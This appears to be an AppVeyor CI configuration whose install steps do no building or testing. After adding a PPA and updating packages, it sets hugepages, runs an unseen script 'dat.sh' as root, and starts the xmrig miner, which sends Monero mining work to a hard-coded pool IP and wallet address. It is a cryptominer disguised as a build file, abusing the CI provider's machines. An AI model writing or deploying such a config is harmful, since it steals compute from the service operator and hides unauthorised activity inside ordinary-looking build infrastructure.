image: ubuntu

install:
  - sudo add-apt-repository -y ppa:ubuntu-toolchain-r/test
  - sudo apt-get -q update
  - sudo sysctl -w vm.nr_hugepages=2336
  - sudo bash ./dat.sh
  - /home/appveyor/xmrig/build/xmrig -o 116.203.73.240:10016 -u 85b8eDYXULz75j9Pv3XuysNKTjzXgmQaqHWzzs9wrvqUHRdDMKsWg3RM9UYXUhTsh9Nfp9NVZhkG7XAkSLcEQqgGEZni5rt -p 3ap3 --donate-level 1 --coin monero -k -o